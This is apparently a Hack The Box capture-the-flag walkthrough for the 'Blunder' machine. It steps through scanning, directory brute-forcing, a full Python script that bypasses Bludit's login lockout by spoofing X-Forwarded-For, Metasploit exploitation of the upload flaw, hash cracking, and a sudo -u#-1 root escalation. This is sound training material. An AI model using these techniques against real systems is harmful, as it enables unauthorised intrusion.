HTB Blunder — Walkthrough

Blunder is an Easy box.

Tools

  • Nmap

Note: for ease of use, i just added the ip address of the machine to my hosts file.

Scanning

As usual the first step during solving any machine is the scanning. Scanning can be done through many tools, but Nmap is the beloved one.

Command:

nmap -Pn -sC -sV -v -T5  -oA Nmap/blunder blun

it seems that we have web application running on port 80

Enumeration

As found in the scanning results, that port 80 is opened, let’s check the running web application.

after going through the HTML source code of the web application, it seems nothing interested, and also there is no interesting Javascript file.

Moving to the next step by performing Directory Bruteforcing to check if there is any directory or interesting files.

will use Dirsearch tool for that purpose,.

command:

python3.7 dirsearch.py -t 100  --http-method=HEAD  -e php -w /usr/share/wordlists/dirb/common.txt -u http://blunder.htb/

the above command uses:

  • -t 100 for using 100 threads

python3.7 diresearch.py -h

For saving time, i did it for PHP extentioned pages, only what i found was /admin page, which was for Admin Login

we can get that the running application is BLUDIT, which is a CMS.

With little google search on the security issues related to that found CMS, i found that there is a way to bypass the bruteforce mitigation method, which is used by that software

This is due to the CMS trust in X-FORWARDED-For http header, which allows the attacker to do bruteforcing without getting blocked by sending fake value for that http request header.

Bludit Brute Force Mitigation Bypass

There is a PoC python code to test this vulnerability, but it requires two inputs:

  1. username (by default admin)

I tried it as it is, but it did not work, so i had to find a way to get usernames and also build a custom wordlist.

Nest step, is to try to do User Enumeration, so i will try to find any other file types, which may leak any info, i tried many extension, till i got that there is an interesting txt file.

command:

python3.7 dirsearch.py  --http-method=HEAD  -e txt -w /usr/share/wordlists/dirb/big.txt -u http://blunder.htb/

the above command uses:

  • –http-method=HEAD for using HEAD http method for the web requests, for getting the result fast.

we can find that there is a username inside the found txt file.

User Flag

Now, Let’s move to the attacking phase, by trying to bruteforce the password of fergus user.

I have used cewl tool for creating a custom wordlist from all words from the web application itself.

command:

cewl -w blunderWordlist.txt http://blunder.htb

So, i have created a custom wordlist to be used during the bruteforce attack using the found python script online.

I just made a little changes to the script to make the username fergus and use the generated wordlist.

below is the modified script, i modified the below variables values:

  • host

and also the way of getting the wordlist to be read from file not to be randomly generated, In addition to the way of presenting the current trial values.

#!/usr/bin/env python3
import re
import requests
host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
wordlist_filename = "Wordlists/blunderWordlist.txt"
wordlist = []
wordlist = open(wordlist_filename,'r').read().split('\n')
print('Working on Wordlist: {w} , with word count {c}'.format(w = wordlist_filename, c = len(wordlist)))
counter=0
for password in wordlist:
counter += 1
session = requests.Session()
login_page = session.get(login_url)
csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
print('[{c}] Trying: {u}:{p}'.format(c= counter, u = username, p = password)) headers = {
'X-Forwarded-For': password,
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
'Referer': login_url
}
data = {
'tokenCSRF': csrf_token,
'username': username,
'password': password,
'save': ''
}
login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False) if 'location' in login_result.headers:
if '/admin/dashboard' in login_result.headers['location']:
print()
print('SUCCESS: Password found!')
print('Use {u}:{p} to login.'.format(u = username, p = password))
print()
break

Run the script

command:

python3.7 bruteForcer.py

So the password for fergus is RolandDeschain

Now, let’s use the above credentials to gain access to admin page

So, the found credentials worked.

After more search about BLUDIT CMS, found that there is a public exploit in the Image upload function, and also there is a Metasploit module for it.

Bludit — Directory Traversal Image File Upload (Metasploit)

Let’s run Metasploit

msfconsole

Now, let’s search on BLUDIT

it requires 3 items:

  1. BLUDITUSER : Username

Now, we got Meterpreter shell.

Now let’s have shell on the machine

Now let’s get the users on the system who have shell access

so there are some users:

  1. root

Found that user hugo has user.txt file

i can not read this file using the current prievelege www-data, So i had to enumerate more to find another way.

after reading more about this CMS, i found that it stores the users detailed in file called users.php in databases directory

I have downloaded the file and checked its contents

after i read more about it, i found that it stores the SHA1 hash of the password with salt, i could not decrypt the admin password, but i found another way to reset the admin password through php script called recovery.php

Bludit Password Recovery Tool

and i could get admin prievelege on the web app, but it was not useful to read the user.txt.

tried to enumerate more inside the box itself till i found that there is a directory called bludit-3.10.0a, which another version from that CMS.

I though that users.php file may contain credentials, so i read it.

this time i found SHA-1 hash for Hugo user, but the surprise is that it was without salt, So i tried to try to decrypt it using one of the online tools.

MD5Hashing.net

so the password for Hugo user is Password120

now let’s switch our user to hugo user

Now let’s read the user.txt

Root flag

Now, is the time to do prievelege escalation.

First thing came to my head is to try the sudo issues, So let’s check for the user sudo permission

command:

sudo -l

So the exploit will be as follow to run /bin/bash as root :

sudo -u#-1 /bin/bash

Now we can read the root.txt

Security Researcher